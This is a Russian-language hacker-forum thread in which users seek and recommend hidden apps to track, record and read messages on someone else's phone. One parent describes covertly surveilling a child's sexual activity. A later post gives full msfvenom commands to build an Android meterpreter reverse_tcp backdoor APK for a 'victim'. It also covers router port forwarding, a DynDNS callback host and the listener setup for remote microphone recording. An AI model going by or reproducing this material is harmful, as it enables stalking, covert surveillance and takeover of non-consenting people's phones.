привет, нужен сервис, программа, скрытого управления слежения и тп за телефоном. главное передвижение онлайн, доступ к мобилке есть )) пробовал аваст анти трефт чето он сдох у них не все командывыполняет, пробовал airdroid, отлично ! но тот бзынькает на мобилке при подключении и в трее уведомление.. искал Phone Control , не нашел ( гугл не то, работаетхер пойми как, платн бесплатно пофиг, кто юзает чего ?
Я уже создавала подобную тему тут https://forum.antichat.ru/threads/441526/ Проверила несколько приложений RAT на телефоне HTC Desire 210 DS, и нашла своего лидера android-monitor.ru лучшее и единственное адекватное приложение которое реально работает, все заявленные функции работают, причем очень качественно! Нужно подключится к камере? Пожалуйста! Переключить на фронтальную, легко, причем все это делает за пол секунды! Нужно скрыть приложение ? Реально скрывается, причем приложение нельзя удалить с телефона без ввода пароля, доступ к файловой системе телефона + карты памяти, + over до хуя фишек, есть тех поддержка которая любезно отвечает на вопросы. Единственное что я там не проверяла это чтение сообщений вацап и вайбер, так как не пользуюсь ими. Никакие другие аналогичные приложения которые тестировались мною даже рядом не стоят с Android Monitor! Я установила приложение своему ребенку, и многое узнала о нем, о его сексуальных предпочтениях, на какой прон он фапает о чем он говорит с друзьями и одноклассниками и.т.д. Я узнала что он сидит на Pornolab.net и чаще всего скачивает продукцию Mompov.com , меня это начало настораживать, к чему бы это .....
Когда выбирал себе браузер на мобилу Android, внимательно и досконально посмотрел - "Что именно будет ставиться, какие привилегии будут даны?" браузер на Chromium source был отклонён сразу. Нахуй не востребован этот клоповник со шпеёнами. Обратился к Mozilla/Firefox. Выпилил из исходников встроенное слежение за пользователем. Признал годным к пользованию и поставил себе на смартфон BlackBerry Z10. Знаю теперь - что нужно выпиливать из source браузеров, чтобы не мешало и не оставляло следов в сети без спроса. Правильный браузер на смартфон - Fennec - компилируется своими умелыми руками.
Reptilicus http://4pda.ru/forum/index.php?showtopic=470933&view=findpost&p=22690706 А вообще, все эти шпионские слежки ебола. Если нужно что-то узнать о человеке, думаю своими силами, выработать план разоблачения над человеком и потом спросить по делу. В жизни пригодится. А программы эти, мусарское дело.
Mobile tool , очень отличная вещь , и местоположение покажет и снимки с камеры сделает и диктофон запустит и все переписки вк , мыло и тд покажет .
Самолично запиливал пейлоад на андрюшу. Читает СМС, отправлят СМС, читает книгу контактов, может сам позвонить и прочее прочее... Без всяких платных служб. Рут права не нужны.
Там ничего сверх военного нет, отправил в ЛС линки. Про запиливаем жертве АПК с бэкдором (перситенс иклюд). Каждый раз когда на ведре появляется инет, в хэндлере открывается сессия.
Собсна выкладываю как я конспектировал для себя.... Сорян что заставил ждать, работал над другим проектом, скоро выложу на ачате. Spoiler: Проект "АНДРЮША" (v. 1.0) Создаём АПК для Андрюши для статики LAN: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=443 --platform android -a dalvik R>/root/test.apk Создаём АПК для Андрюши для Динамики WAN (DynDNS): msfvenom -p android/meterpreter/reverse_tcp LHOST=somedyndns.ddns.net LPORT=443 --platform android -a dalvik R>/root/test_wan.apk Подготовка роутера (на примере TP-Link741): Переадресация -> Виртуальные сервера -> Новый -> Сервисный порт: 8080 IP-Адресс: 192.168.1.254 Сохранить Привязка айпи (на примере TP-Link741): Привязка IP и MAC адресов -> Добавить -> MAC: FF:FF:FF:FF:FF:FF IP: 192.168.1.254 Сохранить Настройка DynDNS (на примере TP-Link741): Динамический DNS -> Сервис провайдер: no-ip.com Имя пользователя: somename Пароль: somepass Доменное имя: mydns-server Вкл DDNS - Да Сохранить Обеспечение сессии на ноуте (Настроить листнер и ожидать сессии (найти статью по скрипту запуску листнера) : service postgresql start msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp options set LHOST 192.168.1.254 set LPORT 443 exploit -j Замечания по работе метерпретера: record_mic -d 20* // - Запись с микрофона, где d - количество секунд / 2 , по факту будет записано 10 секунд. Максимальное ко-во записи 10 секунд? Через ДинНДС очень плохо работает... возможно нужно использовать только для локальной сети? Это просто пейлоад который инсталится в телефоне. Когда появляется 3G\WiFI он стучится по указанному адресу. Виден только в запущенных службах. Есть вторая версия, где я произвожу реверс приложения , делаю инклюд и собираю обратно. Но мои записи будут вам непонятны т.к. многое опущено...
Ваш вопрос можно решить через гугл акаунт и включеный gps н а том телефоне. Или же аваст вам в помощ!!! Работает хорощо и скрыто!